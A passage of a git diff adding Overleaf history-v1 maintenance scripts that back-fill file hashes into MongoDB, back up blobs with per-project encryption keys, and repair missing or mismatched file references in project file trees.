next. + // We should never have more than CONCURRENT_BATCHES batches in memory. 
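    // (Editor's note: Promise.race also rejects as soon as any in-flight
    // batch fails, so fatal errors propagate instead of queueing further
    // batches.)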
+ await Promise.race(deferredBatches.values()) + } +} + +/** + * @param {Array<Project>} batch + * @param {string} prefix + * @return {Promise<void>} + */ +async function processBatch(batch, prefix = 'rootFolder.0') { + const [deletedFiles, { nBlobs, blobs }, { nBackedUpBlobs, backedUpBlobs }] = + await Promise.all([ + collectDeletedFiles(batch), + collectProjectBlobs(batch), + collectBackedUpBlobs(batch), + ]) + const files = Array.from( + findFileInBatch(batch, prefix, deletedFiles, blobs, backedUpBlobs) + ) + STATS.projects += batch.length + STATS.blobs += nBlobs + STATS.backedUpBlobs += nBackedUpBlobs + + // GC + batch.length = 0 + deletedFiles.clear() + blobs.clear() + backedUpBlobs.clear() + + // The files are currently ordered by project-id. + // Order them by file-id ASC then blobs ASC to + // - process files before blobs + // - avoid head-of-line blocking from many project-files waiting on the generation of the projects DEK (round trip to AWS) + // - bonus: increase chance of de-duplicating write to AWS + files.sort( + /** + * @param {QueueEntry} a + * @param {QueueEntry} b + * @return {number} + */ + function (a, b) { + if (a.fileId && b.fileId) return a.fileId > b.fileId ? 1 : -1 + if (a.hash && b.hash) return a.hash > b.hash ? 1 : -1 + if (a.fileId) return -1 + return 1 + } + ) + await processFiles(files) + await processConcurrently( + files, + /** + * @param {QueueEntry} entry + * @return {Promise<void>} + */ + async function (entry) { + await entry.ctx.flushMongoQueues() + } + ) +} + +/** + * @param {Array<{project: Project}>} batch + * @return {Promise<void>} + */ +async function handleDeletedFileTreeBatch(batch) { + await queueNextBatch( + batch.map(d => d.project), + 'project.rootFolder.0' + ) +} + +/** + * @param {QueueEntry} entry + * @return {Promise<boolean>} + */ +async function tryUpdateFileRefInMongo(entry) { + if (entry.path === MONGO_PATH_DELETED_FILE) { + return await tryUpdateDeletedFileRefInMongo(entry) + } else if (entry.path.startsWith('project.')) { + return await tryUpdateFileRefInMongoInDeletedProject(entry) + } + + STATS.mongoUpdates++ + const result = await projectsCollection.updateOne( + { + _id: entry.ctx.projectId, + [`${entry.path}._id`]: new ObjectId(entry.fileId), + }, + { + $set: { [`${entry.path}.hash`]: entry.hash }, + } + ) + return result.matchedCount === 1 +} + +/** + * @param {QueueEntry} entry + * @return {Promise<boolean>} + */ +async function tryUpdateDeletedFileRefInMongo(entry) { + STATS.mongoUpdates++ + const result = await deletedFilesCollection.updateOne( + { + _id: new ObjectId(entry.fileId), + projectId: entry.ctx.projectId, + }, + { $set: { hash: entry.hash } } + ) + return result.matchedCount === 1 +} + +/** + * @param {QueueEntry} entry + * @return {Promise<boolean>} + */ +async function tryUpdateFileRefInMongoInDeletedProject(entry) { + STATS.mongoUpdates++ + const result = await deletedProjectsCollection.updateOne( + { + 'deleterData.deletedProjectId': entry.ctx.projectId, + [`${entry.path}._id`]: new ObjectId(entry.fileId), + }, + { + $set: { [`${entry.path}.hash`]: entry.hash }, + } + ) + return result.matchedCount === 1 +} + +const RETRY_UPDATE_HASH = 100 + +/** + * @param {QueueEntry} entry + * @return {Promise<void>} + */ +async function updateFileRefInMongo(entry) { + if (await tryUpdateFileRefInMongo(entry)) return + + const { fileId } = entry + const { projectId } = entry.ctx + for (let i = 0; i < RETRY_UPDATE_HASH; i++) { + let prefix = 'rootFolder.0' + let p = await projectsCollection.findOne( + { _id: projectId }, + 
{ projection: { rootFolder: 1 } } + ) + if (!p) { + STATS.projectDeleted++ + prefix = 'project.rootFolder.0' + const deletedProject = await deletedProjectsCollection.findOne( + { + 'deleterData.deletedProjectId': projectId, + project: { $exists: true }, + }, + { projection: { 'project.rootFolder': 1 } } + ) + p = deletedProject?.project + if (!p) { + STATS.projectHardDeleted++ + console.warn( + 'bug: project hard-deleted while processing', + projectId, + fileId + ) + return + } + } + let found = false + for (const e of findFiles(entry.ctx, p.rootFolder[0], prefix)) { + found = e.fileId === fileId + if (!found) continue + if (await tryUpdateFileRefInMongo(e)) return + break + } + if (!found) { + if (await tryUpdateDeletedFileRefInMongo(entry)) return + STATS.fileHardDeleted++ + console.warn('bug: file hard-deleted while processing', projectId, fileId) + return + } + + STATS.fileTreeUpdated++ + } + throw new OError( + 'file-tree updated repeatedly while trying to add hash', + entry + ) +} + +/** + * @param {ProjectContext} ctx + * @param {Folder} folder + * @param {string} path + * @param {boolean} isInputLoop + * @return Generator<QueueEntry> + */ +function* findFiles(ctx, folder, path, isInputLoop = false) { + if (!folder || typeof folder !== 'object') { + ctx.fileTreeBroken = true + logger.warn({ projectId: ctx.projectId, path }, 'bad file-tree, bad folder') + return + } + if (!Array.isArray(folder.folders)) { + folder.folders = [] + ctx.fileTreeBroken = true + logger.warn( + { projectId: ctx.projectId, path: `${path}.folders` }, + 'bad file-tree, bad folders' + ) + } + let i = 0 + for (const child of folder.folders) { + const idx = i++ + yield* findFiles(ctx, child, `${path}.folders.${idx}`, isInputLoop) + } + if (!Array.isArray(folder.fileRefs)) { + folder.fileRefs = [] + ctx.fileTreeBroken = true + logger.warn( + { projectId: ctx.projectId, path: `${path}.fileRefs` }, + 'bad file-tree, bad fileRefs' + ) + } + i = 0 + for (const fileRef of folder.fileRefs) { + const idx = i++ + const fileRefPath = `${path}.fileRefs.${idx}` + if (!fileRef._id || !(fileRef._id instanceof ObjectId)) { + ctx.fileTreeBroken = true + logger.warn( + { projectId: ctx.projectId, path: fileRefPath }, + 'bad file-tree, bad fileRef id' + ) + continue + } + const fileId = fileRef._id.toString() + if (PROCESS_HASHED_FILES && fileRef.hash) { + if (ctx.canSkipProcessingHashedFile(fileRef.hash)) continue + if (isInputLoop) { + ctx.remainingQueueEntries++ + STATS.filesWithHash++ + } + yield { + ctx, + cacheKey: fileRef.hash, + fileId, + path: MONGO_PATH_SKIP_WRITE_HASH_TO_FILE_TREE, + hash: fileRef.hash, + } + } + if (!fileRef.hash) { + if (isInputLoop) { + ctx.remainingQueueEntries++ + STATS.filesWithoutHash++ + } + yield { + ctx, + cacheKey: fileId, + fileId, + path: fileRefPath, + } + } + } +} + +/** + * @param {Array<Project>} projects + * @param {string} prefix + * @param {Map<string,Array<DeletedFileRef>>} deletedFiles + * @param {Map<string,Array<Blob>>} blobs + * @param {Map<string,Array<string>>} backedUpBlobs + * @return Generator<QueueEntry> + */ +function* findFileInBatch( + projects, + prefix, + deletedFiles, + blobs, + backedUpBlobs +) { + for (const project of projects) { + const projectIdS = project._id.toString() + const historyIdS = project.overleaf.history.id.toString() + const projectBlobs = blobs.get(historyIdS) || [] + const projectBackedUpBlobs = new Set(backedUpBlobs.get(projectIdS) || []) + const projectDeletedFiles = deletedFiles.get(projectIdS) || [] + const ctx = new ProjectContext( + 
project._id, + historyIdS, + projectBlobs, + projectBackedUpBlobs + ) + for (const fileRef of projectDeletedFiles) { + const fileId = fileRef._id.toString() + if (fileRef.hash) { + if (ctx.canSkipProcessingHashedFile(fileRef.hash)) continue + ctx.remainingQueueEntries++ + STATS.filesWithHash++ + yield { + ctx, + cacheKey: fileRef.hash, + fileId, + hash: fileRef.hash, + path: MONGO_PATH_SKIP_WRITE_HASH_TO_FILE_TREE, + } + } else { + ctx.remainingQueueEntries++ + STATS.filesWithoutHash++ + yield { ctx, cacheKey: fileId, fileId, path: MONGO_PATH_DELETED_FILE } + } + } + for (const blob of projectBlobs) { + if (projectBackedUpBlobs.has(blob.getHash())) continue + ctx.remainingQueueEntries++ + yield { + ctx, + cacheKey: blob.getHash(), + path: MONGO_PATH_SKIP_WRITE_HASH_TO_FILE_TREE, + blob, + hash: blob.getHash(), + } + } + try { + yield* findFiles(ctx, project.rootFolder?.[0], prefix, true) + } catch (err) { + logger.error( + { err, projectId: projectIdS }, + 'bad file-tree, processing error' + ) + } finally { + if (ctx.fileTreeBroken) STATS.badFileTrees++ + } + } +} + +/** + * @param {Array<Project>} batch + * @return {Promise<{nBlobs: number, blobs: Map<string, Array<Blob>>}>} + */ +async function collectProjectBlobs(batch) { + if (!PROCESS_BLOBS) return { nBlobs: 0, blobs: new Map() } + return await getProjectBlobsBatch(batch.map(p => p.overleaf.history.id)) +} + +/** + * @param {Array<Project>} projects + * @return {Promise<Map<string, Array<DeletedFileRef>>>} + */ +async function collectDeletedFiles(projects) { + const deletedFiles = new Map() + if (!PROCESS_DELETED_FILES) return deletedFiles + + const cursor = deletedFilesCollection.find( + { + projectId: { $in: projects.map(p => p._id) }, + ...(PROCESS_HASHED_FILES + ? {} + : { + hash: { $exists: false }, + }), + }, + { + projection: { _id: 1, projectId: 1, hash: 1 }, + readPreference: READ_PREFERENCE_SECONDARY, + sort: { projectId: 1 }, + } + ) + for await (const deletedFileRef of cursor) { + const projectId = deletedFileRef.projectId.toString() + const found = deletedFiles.get(projectId) + if (found) { + found.push(deletedFileRef) + } else { + deletedFiles.set(projectId, [deletedFileRef]) + } + } + return deletedFiles +} + +/** + * @param {Array<Project>} projects + * @return {Promise<{nBackedUpBlobs:number,backedUpBlobs:Map<string,Array<string>>}>} + */ +async function collectBackedUpBlobs(projects) { + let nBackedUpBlobs = 0 + const backedUpBlobs = new Map() + if (!COLLECT_BACKED_UP_BLOBS) return { nBackedUpBlobs, backedUpBlobs } + + const cursor = backedUpBlobsCollection.find( + { _id: { $in: projects.map(p => p._id) } }, + { + readPreference: READ_PREFERENCE_SECONDARY, + sort: { _id: 1 }, + } + ) + for await (const record of cursor) { + const blobs = record.blobs.map(b => b.toString('hex')) + backedUpBlobs.set(record._id.toString(), blobs) + nBackedUpBlobs += blobs.length + } + return { nBackedUpBlobs, backedUpBlobs } +} + +const BATCH_HASH_WRITES = 1_000 +const BATCH_FILE_UPDATES = 100 + +const MONGO_PATH_DELETED_FILE = 'deleted-file' +const MONGO_PATH_SKIP_WRITE_HASH_TO_FILE_TREE = 'skip-write-to-file-tree' + +class ProjectContext { + /** @type {Promise<CachedPerProjectEncryptedS3Persistor> | null} */ + #cachedPersistorPromise = null + + /** @type {Set<string>} */ + #backedUpBlobs + + /** @type {Map<string, Blob>} */ + #historyBlobs + + /** @type {number} */ + remainingQueueEntries = 0 + + /** @type {boolean} */ + fileTreeBroken = false + + /** + * @param {ObjectId} projectId + * @param {string} historyId + * @param 
{Array<Blob>} blobs + * @param {Set<string>} backedUpBlobs + */ + constructor(projectId, historyId, blobs, backedUpBlobs) { + this.projectId = projectId + this.historyId = historyId + this.#backedUpBlobs = backedUpBlobs + this.#historyBlobs = new Map(blobs.map(b => [b.getHash(), b])) + } + + /** + * @param {string} hash + * @return {Blob | undefined} + */ + getCachedHistoryBlob(hash) { + return this.#historyBlobs.get(hash) + } + + /** + * @param {Blob} blob + */ + recordHistoryBlob(blob) { + this.#historyBlobs.set(blob.getHash(), blob) + } + + /** + * @param {string} hash + * @return {boolean} + */ + canSkipProcessingHashedFile(hash) { + if (this.#historyBlobs.has(hash)) return true // This file will be processed as blob. + if (GLOBAL_BLOBS.has(hash)) return true // global blob + return false + } + + /** + * @param {string} key + * @return {Promise<CachedPerProjectEncryptedS3Persistor>} + */ + getCachedPersistor(key) { + if (!this.#cachedPersistorPromise) { + // Fetch DEK once, but only if needed -- upon the first use + this.#cachedPersistorPromise = this.#getCachedPersistorWithRetries(key) + } + return this.#cachedPersistorPromise + } + + /** + * @param {string} key + * @return {Promise<CachedPerProjectEncryptedS3Persistor>} + */ + async #getCachedPersistorWithRetries(key) { + // Optimization: Skip GET on DEK in case no blobs are marked as backed up yet. + let tryGenerateDEKFirst = this.#backedUpBlobs.size === 0 + for (let attempt = 0; attempt < RETRIES; attempt++) { + try { + if (tryGenerateDEKFirst) { + try { + return await backupPersistor.generateDataEncryptionKey( + projectBlobsBucket, + key + ) + } catch (err) { + if (err instanceof AlreadyWrittenError) { + tryGenerateDEKFirst = false + // fall back to GET below + } else { + throw err + } + } + } + return await backupPersistor.forProject(projectBlobsBucket, key) + } catch (err) { + if (gracefulShutdownInitiated) throw err + if (err instanceof NoKEKMatchedError) { + throw err + } else { + logger.warn( + { err, projectId: this.projectId, attempt }, + 'failed to get DEK, trying again' + ) + const jitter = Math.random() * RETRY_DELAY_MS + await setTimeout(RETRY_DELAY_MS + jitter) + } + } + } + return await backupPersistor.forProject(projectBlobsBucket, key) + } + + async flushMongoQueuesIfNeeded() { + if (this.remainingQueueEntries === 0) { + await this.flushMongoQueues() + } + + if (this.#completedBlobs.size > BATCH_HASH_WRITES) { + await this.#storeBackedUpBlobs() + } + if (this.#pendingFileWrites.length > BATCH_FILE_UPDATES) { + await this.#storeFileHashes() + } + } + + async flushMongoQueues() { + await this.#storeBackedUpBlobs() + await this.#storeFileHashes() + } + + /** @type {Set<string>} */ + #pendingBlobs = new Set() + /** @type {Set<string>} */ + #completedBlobs = new Set() + + async #storeBackedUpBlobs() { + if (this.#completedBlobs.size === 0) return + const blobs = Array.from(this.#completedBlobs).map( + hash => new Binary(Buffer.from(hash, 'hex')) + ) + this.#completedBlobs.clear() + STATS.mongoUpdates++ + await backedUpBlobsCollection.updateOne( + { _id: this.projectId }, + { $addToSet: { blobs: { $each: blobs } } }, + { upsert: true } + ) + } + + /** + * @param {string} hash + */ + recordPendingBlob(hash) { + this.#pendingBlobs.add(hash) + } + + /** + * @param {string} hash + */ + recordFailedBlob(hash) { + this.#pendingBlobs.delete(hash) + } + + /** + * @param {string} hash + */ + recordBackedUpBlob(hash) { + this.#backedUpBlobs.add(hash) + this.#completedBlobs.add(hash) + this.#pendingBlobs.delete(hash) + } + + /** + * 
@param {string} hash + * @return {boolean} + */ + hasBackedUpBlob(hash) { + return ( + this.#pendingBlobs.has(hash) || + this.#completedBlobs.has(hash) || + this.#backedUpBlobs.has(hash) + ) + } + + /** @type {Array<QueueEntry>} */ + #pendingFileWrites = [] + + /** + * @param {QueueEntry} entry + */ + queueFileForWritingHash(entry) { + if (entry.path === MONGO_PATH_SKIP_WRITE_HASH_TO_FILE_TREE) return + this.#pendingFileWrites.push(entry) + } + + /** + * @param {Collection} collection + * @param {Array<QueueEntry>} entries + * @param {Object} query + * @return {Promise<Array<QueueEntry>>} + */ + async #tryBatchHashWrites(collection, entries, query) { + if (entries.length === 0) return [] + const update = {} + for (const entry of entries) { + query[`${entry.path}._id`] = new ObjectId(entry.fileId) + update[`${entry.path}.hash`] = entry.hash + } + STATS.mongoUpdates++ + const result = await collection.updateOne(query, { $set: update }) + if (result.matchedCount === 1) { + return [] // all updated + } + return entries + } + + async #storeFileHashes() { + if (this.#pendingFileWrites.length === 0) return + const individualUpdates = [] + const projectEntries = [] + const deletedProjectEntries = [] + for (const entry of this.#pendingFileWrites) { + if (entry.path === MONGO_PATH_DELETED_FILE) { + individualUpdates.push(entry) + } else if (entry.path.startsWith('project.')) { + deletedProjectEntries.push(entry) + } else { + projectEntries.push(entry) + } + } + this.#pendingFileWrites.length = 0 + + // Try to process them together, otherwise fallback to individual updates and retries. + individualUpdates.push( + ...(await this.#tryBatchHashWrites(projectsCollection, projectEntries, { + _id: this.projectId, + })) + ) + individualUpdates.push( + ...(await this.#tryBatchHashWrites( + deletedProjectsCollection, + deletedProjectEntries, + { 'deleterData.deletedProjectId': this.projectId } + )) + ) + for (const entry of individualUpdates) { + await updateFileRefInMongo(entry) + } + } + + /** @type {Map<string, Promise<string>>} */ + #pendingFiles = new Map() + + /** + * @param {QueueEntry} entry + */ + async processFile(entry) { + if (this.#pendingFiles.has(entry.cacheKey)) { + STATS.filesDuplicated++ + } else { + this.#pendingFiles.set(entry.cacheKey, processFileWithCleanup(entry)) + } + try { + entry.hash = await this.#pendingFiles.get(entry.cacheKey) + } finally { + this.remainingQueueEntries-- + } + this.queueFileForWritingHash(entry) + await this.flushMongoQueuesIfNeeded() + } +} + +/** + * @param {Blob} blob + * @return {number} + */ +function estimateBlobSize(blob) { + let size = blob.getByteLength() + if (blob.getStringLength()) { + // approximation for gzip (25 bytes gzip overhead and 20% compression ratio) + size = 25 + Math.ceil(size * 0.2) + } + return size +} + +async function processProjectsFromFile() { + const rl = readline.createInterface({ + input: fs.createReadStream(PROJECT_IDS_FROM), + }) + for await (const projectId of rl) { + if (!projectId) continue // skip over trailing new line + let project = await typedProjectsCollection.findOne( + { _id: new ObjectId(projectId) }, + { projection: { rootFolder: 1, _id: 1, 'overleaf.history.id': 1 } } + ) + let prefix = 'rootFolder.0' + if (!project) { + const deletedProject = await typedDeletedProjectsCollection.findOne( + { 'deleterData.deletedProjectId': new ObjectId(projectId) }, + { + projection: { + 'project.rootFolder': 1, + 'project._id': 1, + 'project.overleaf.history.id': 1, + }, + } + ) + if (!deletedProject?.project) { + logger.warn({ 
projectId }, 'project hard-deleted') + continue + } + project = deletedProject.project + prefix = 'project.rootFolder.0' + } + if (!project?.overleaf?.history?.id) { + logger.warn({ projectId }, 'project has no history id') + continue + } + try { + await queueNextBatch([project], prefix) + } catch (err) { + gracefulShutdownInitiated = true + await waitForDeferredQueues() + throw err + } + } + await waitForDeferredQueues() + console.warn('Done updating projects from input file') +} + +async function processNonDeletedProjects() { + try { + await batchedUpdate( + projectsCollection, + { 'overleaf.history.id': { $exists: true } }, + queueNextBatch, + { rootFolder: 1, _id: 1, 'overleaf.history.id': 1 }, + {}, + { + BATCH_RANGE_START, + BATCH_RANGE_END, + } + ) + } catch (err) { + gracefulShutdownInitiated = true + throw err + } finally { + await waitForDeferredQueues() + } + console.warn('Done updating live projects') +} + +async function processDeletedProjects() { + try { + await batchedUpdate( + deletedProjectsCollection, + { + 'deleterData.deletedProjectId': { + $gt: new ObjectId(BATCH_RANGE_START), + $lte: new ObjectId(BATCH_RANGE_END), + }, + 'project.overleaf.history.id': { $exists: true }, + }, + handleDeletedFileTreeBatch, + { + 'project.rootFolder': 1, + 'project._id': 1, + 'project.overleaf.history.id': 1, + } + ) + } catch (err) { + gracefulShutdownInitiated = true + throw err + } finally { + await waitForDeferredQueues() + } + console.warn('Done updating deleted projects') +} + +async function main() { + await loadGlobalBlobs() + if (PROJECT_IDS_FROM) { + await processProjectsFromFile() + } else { + if (PROCESS_NON_DELETED_PROJECTS) { + await processNonDeletedProjects() + } + if (PROCESS_DELETED_PROJECTS) { + await processDeletedProjects() + } + } + console.warn('Done.') +} + +try { + try { + await main() + } finally { + printStats(true) + try { + // Perform non-recursive removal of the BUFFER_DIR. Individual files + // should get removed in parallel as part of batch processing. 
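+ // fs.promises.rmdir on a non-empty directory rejects with
+ // { code: 'ENOTEMPTY' }, so any temp file leaked by batch processing
+ // surfaces in the error log below instead of being silently swept away.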
+ await fs.promises.rmdir(BUFFER_DIR) + } catch (err) { + console.error(`cleanup of BUFFER_DIR=${BUFFER_DIR} failed`, err) + } + } + + let code = 0 + if (STATS.filesFailed > 0) { + console.warn('Some files could not be processed, see logs and try again') + code++ + } + if (STATS.fileHardDeleted > 0) { + console.warn( + 'Some hashes could not be updated as the files were hard-deleted, this should not happen' + ) + code++ + } + if (STATS.projectHardDeleted > 0) { + console.warn( + 'Some hashes could not be updated as the project was hard-deleted, this should not happen' + ) + code++ + } + await setTimeout(SLEEP_BEFORE_EXIT) + process.exit(code) +} catch (err) { + console.error(err) + await setTimeout(SLEEP_BEFORE_EXIT) + process.exit(1) +} diff --git a/services/history-v1/storage/scripts/back_fill_file_hash_fix_up.mjs b/services/history-v1/storage/scripts/back_fill_file_hash_fix_up.mjs new file mode 100644 index 0000000..7bab794 --- /dev/null +++ b/services/history-v1/storage/scripts/back_fill_file_hash_fix_up.mjs @@ -0,0 +1,647 @@ +// @ts-check +import Events from 'node:events' +import fs from 'node:fs' +import Stream from 'node:stream' +import { ObjectId } from 'mongodb' +import logger from '@overleaf/logger' +import OError from '@overleaf/o-error' +import { Blob } from 'overleaf-editor-core' +import { + BlobStore, + getStringLengthOfFile, + GLOBAL_BLOBS, + makeBlobForFile, +} from '../lib/blob_store/index.js' +import { db } from '../lib/mongodb.js' +import commandLineArgs from 'command-line-args' +import readline from 'node:readline' +import { _blobIsBackedUp, backupBlob } from '../lib/backupBlob.mjs' +import { NotFoundError } from '@overleaf/object-persistor/src/Errors.js' +import filestorePersistor from '../lib/persistor.js' +import { setTimeout } from 'node:timers/promises' + +// Silence warning. 
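+// Node emits MaxListenersExceededWarning once more than 10 listeners are
+// attached to a single emitter (or AbortSignal); the concurrent streams used
+// below can legitimately exceed that. events.setMaxListeners(20) raises the
+// default globally; the per-emitter equivalent would be (illustrative):
+//   import { EventEmitter } from 'node:events'
+//   new EventEmitter().setMaxListeners(20)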
+Events.setMaxListeners(20)
+
+// Enable caching for ObjectId.toString()
+ObjectId.cacheHexString = true
+
+/**
+ * @typedef {import("mongodb").Collection} Collection
+ * @typedef {import("mongodb").Collection<Project>} ProjectsCollection
+ * @typedef {import("mongodb").Collection<{project: Project}>} DeletedProjectsCollection
+ */
+
+/**
+ * @typedef {Object} FileRef
+ * @property {ObjectId} _id
+ * @property {string} hash
+ */
+
+/**
+ * @typedef {Object} Folder
+ * @property {Array<Folder>} folders
+ * @property {Array<FileRef>} fileRefs
+ */
+
+/**
+ * @typedef {Object} Project
+ * @property {ObjectId} _id
+ * @property {Array<Folder>} rootFolder
+ * @property {{history: {id: (number|string)}}} overleaf
+ */
+
+/**
+ * @return {{FIX_NOT_FOUND: boolean, FIX_HASH_MISMATCH: boolean, FIX_DELETE_PERMISSION: boolean, FIX_MISSING_HASH: boolean, LOGS: string}}
+ */
+function parseArgs() {
+ const args = commandLineArgs([
+ { name: 'fixNotFound', type: String, defaultValue: 'true' },
+ { name: 'fixDeletePermission', type: String, defaultValue: 'true' },
+ { name: 'fixHashMismatch', type: String, defaultValue: 'true' },
+ { name: 'fixMissingHash', type: String, defaultValue: 'true' },
+ { name: 'logs', type: String, defaultValue: '' },
+ ])
+ /**
+ * commandLineArgs cannot handle --foo=false, so go the long way
+ * @param {string} name
+ * @return {boolean}
+ */
+ function boolVal(name) {
+ const v = args[name]
+ if (['true', 'false'].includes(v)) return v === 'true'
+ throw new Error(`expected "true" or "false" for boolean option ${name}`)
+ }
+ return {
+ FIX_HASH_MISMATCH: boolVal('fixHashMismatch'),
+ FIX_DELETE_PERMISSION: boolVal('fixDeletePermission'),
+ FIX_NOT_FOUND: boolVal('fixNotFound'),
+ FIX_MISSING_HASH: boolVal('fixMissingHash'),
+ LOGS: args.logs,
+ }
+}
+
+const {
+ FIX_HASH_MISMATCH,
+ FIX_DELETE_PERMISSION,
+ FIX_NOT_FOUND,
+ FIX_MISSING_HASH,
+ LOGS,
+} = parseArgs()
+if (!LOGS) {
+ throw new Error('--logs parameter missing')
+}
+const BUFFER_DIR = fs.mkdtempSync(
+ process.env.BUFFER_DIR_PREFIX || '/tmp/back_fill_file_hash-'
+)
+const USER_FILES_BUCKET_NAME = process.env.USER_FILES_BUCKET_NAME || ''
+if (!USER_FILES_BUCKET_NAME) {
+ throw new Error('env var USER_FILES_BUCKET_NAME is missing')
+}
+// https://nodejs.org/api/stream.html#streamgetdefaulthighwatermarkobjectmode
+const STREAM_HIGH_WATER_MARK = parseInt(
+ process.env.STREAM_HIGH_WATER_MARK || (64 * 1024).toString(),
+ 10
+)
+const SLEEP_BEFORE_EXIT = parseInt(process.env.SLEEP_BEFORE_EXIT || '1000', 10)
+
+/** @type {ProjectsCollection} */
+const projectsCollection = db.collection('projects')
+/** @type {DeletedProjectsCollection} */
+const deletedProjectsCollection = db.collection('deletedProjects')
+
+let gracefulShutdownInitiated = false
+
+process.on('SIGINT', handleSignal)
+process.on('SIGTERM', handleSignal)
+
+function handleSignal() {
+ gracefulShutdownInitiated = true
+ console.warn('graceful shutdown initiated, draining queue')
+}
+
+class FileDeletedError extends OError {}
+
+/** @type {Map<string,{project: Project, projectSoftDeleted: boolean}>} */
+const PROJECT_CACHE = new Map()
+
+/**
+ * @param {string} projectId
+ * @return {Promise<{project: Project, projectSoftDeleted: boolean}>}
+ */
+async function getProject(projectId) {
+ const cached = PROJECT_CACHE.get(projectId)
+ if (cached) return cached
+
+ let projectSoftDeleted
+ let project = await projectsCollection.findOne({
+ _id: new ObjectId(projectId),
+ })
+ if (project) {
+ projectSoftDeleted = false
+ } else {
+ const softDeleted = await
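+ // Not found among live projects: fall back to deletedProjects, where a
+ // soft-deleted project keeps its full document under `project` and can
+ // still be patched in place.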
deletedProjectsCollection.findOne({ + 'deleterData.deletedProjectId': new ObjectId(projectId), + project: { $exists: true }, + }) + if (!softDeleted) { + throw new OError('project hard-deleted') + } + project = softDeleted.project + projectSoftDeleted = true + } + PROJECT_CACHE.set(projectId, { projectSoftDeleted, project }) + return { projectSoftDeleted, project } +} + +/** + * @param {Folder} folder + * @param {string} fileId + * @return {{path: string, fileRef: FileRef, folder: Folder}|null} + */ +function getFileTreePath(folder, fileId) { + if (!folder) return null + let idx = 0 + if (Array.isArray(folder.fileRefs)) { + for (const fileRef of folder.fileRefs) { + if (fileRef?._id.toString() === fileId) { + return { + fileRef, + path: `.fileRefs.${idx}`, + folder, + } + } + idx++ + } + } + idx = 0 + if (Array.isArray(folder.folders)) { + for (const child of folder.folders) { + const match = getFileTreePath(child, fileId) + if (match) { + return { + fileRef: match.fileRef, + folder: match.folder, + path: `.folders.${idx}${match.path}`, + } + } + idx++ + } + } + return null +} + +/** + * @param {string} projectId + * @param {string} fileId + * @return {Promise<{fileRef: FileRef, folder: Folder, fullPath: string, query: Object, projectSoftDeleted: boolean}>} + */ +async function findFile(projectId, fileId) { + const { projectSoftDeleted, project } = await getProject(projectId) + const match = getFileTreePath(project.rootFolder[0], fileId) + if (!match) { + throw new FileDeletedError('file not found in file-tree', { + projectSoftDeleted, + }) + } + const { path, fileRef, folder } = match + let fullPath + let query + if (projectSoftDeleted) { + fullPath = `project.rootFolder.0${path}` + query = { + 'deleterData.deletedProjectId': new ObjectId(projectId), + [`${fullPath}._id`]: new ObjectId(fileId), + } + } else { + fullPath = `rootFolder.0${path}` + query = { + _id: new ObjectId(projectId), + [`${fullPath}._id`]: new ObjectId(fileId), + } + } + return { + projectSoftDeleted, + query, + fullPath, + fileRef, + folder, + } +} + +/** + * @param {string} line + * @return {Promise<boolean>} + */ +async function fixNotFound(line) { + const { projectId, fileId, bucketName } = JSON.parse(line) + if (bucketName !== USER_FILES_BUCKET_NAME) { + throw new OError('not found case for another bucket') + } + + const { projectSoftDeleted, query, fullPath, fileRef, folder } = + await findFile(projectId, fileId) + logger.info({ projectId, fileId, fileRef }, 'removing fileRef') + // Copied from _removeElementFromMongoArray (https://github.com/overleaf/internal/blob/11e09528c153de6b7766d18c3c90d94962190371/services/web/app/src/Features/Project/ProjectEntityMongoUpdateHandler.js) + const nonArrayPath = fullPath.slice(0, fullPath.lastIndexOf('.')) + let result + if (projectSoftDeleted) { + result = await deletedProjectsCollection.updateOne(query, { + $pull: { [nonArrayPath]: { _id: new ObjectId(fileId) } }, + $inc: { 'project.version': 1 }, + }) + } else { + result = await projectsCollection.updateOne(query, { + $pull: { [nonArrayPath]: { _id: new ObjectId(fileId) } }, + $inc: { version: 1 }, + }) + } + if (result.matchedCount !== 1) { + throw new OError('file-tree write did not match', { result }) + } + // Update the cache. The mongo-path of the next file will be off otherwise. 
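+ // Example: if fileRefs was [a, b] and a was just $pull-ed, b now sits at
+ // index 0 in mongo, so paths computed from the stale cache (e.g.
+ // '.fileRefs.1') would point past the end; filtering the cached folder
+ // keeps later getFileTreePath results in sync.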
+ folder.fileRefs = folder.fileRefs.filter(f => !f._id.equals(fileId)) + return true +} + +/** + * @param {string} projectId + * @param {string} fileId + * @param {string} hash + * @return {Promise<void>} + */ +async function setHashInMongo(projectId, fileId, hash) { + const { projectSoftDeleted, query, fullPath, fileRef } = await findFile( + projectId, + fileId + ) + if (fileRef.hash === hash) return + logger.info({ projectId, fileId, fileRef, hash }, 'setting fileRef hash') + let result + if (projectSoftDeleted) { + result = await deletedProjectsCollection.updateOne(query, { + $set: { [`${fullPath}.hash`]: hash }, + $inc: { 'project.version': 1 }, + }) + } else { + result = await projectsCollection.updateOne(query, { + $set: { [`${fullPath}.hash`]: hash }, + $inc: { version: 1 }, + }) + } + if (result.matchedCount !== 1) { + throw new OError('file-tree write did not match', { result }) + } + fileRef.hash = hash // Update cache for completeness. +} + +/** + * @param {string} projectId + * @param {string} fileId + * @param {string} historyId + * @return {Promise<void>} + */ +async function importRestoredFilestoreFile(projectId, fileId, historyId) { + const filestoreKey = `${projectId}/${fileId}` + const path = `${BUFFER_DIR}/${projectId}_${fileId}` + try { + let s + try { + s = await filestorePersistor.getObjectStream( + USER_FILES_BUCKET_NAME, + filestoreKey + ) + } catch (err) { + if (err instanceof NotFoundError) { + throw new OError('missing blob, need to restore filestore file', { + filestoreKey, + }) + } + throw err + } + await Stream.promises.pipeline( + s, + fs.createWriteStream(path, { highWaterMark: STREAM_HIGH_WATER_MARK }) + ) + const blobStore = new BlobStore(historyId) + const blob = await blobStore.putFile(path) + await backupBlob(historyId, blob, path) + await setHashInMongo(projectId, fileId, blob.getHash()) + } finally { + await fs.promises.rm(path, { force: true }) + } +} + +/** + * @param {string} projectId + * @param {string} fileId + * @param {string} path + * @return {Promise<Blob>} + */ +async function bufferFilestoreFileToDisk(projectId, fileId, path) { + const filestoreKey = `${projectId}/${fileId}` + try { + await Stream.promises.pipeline( + await filestorePersistor.getObjectStream( + USER_FILES_BUCKET_NAME, + filestoreKey + ), + fs.createWriteStream(path, { highWaterMark: STREAM_HIGH_WATER_MARK }) + ) + const blob = await makeBlobForFile(path) + blob.setStringLength( + await getStringLengthOfFile(blob.getByteLength(), path) + ) + return blob + } catch (err) { + if (err instanceof NotFoundError) { + throw new OError('missing blob, need to restore filestore file', { + filestoreKey, + }) + } + throw err + } +} + +/** + * @param {string} projectId + * @param {string} fileId + * @return {Promise<string>} + */ +async function computeFilestoreFileHash(projectId, fileId) { + const path = 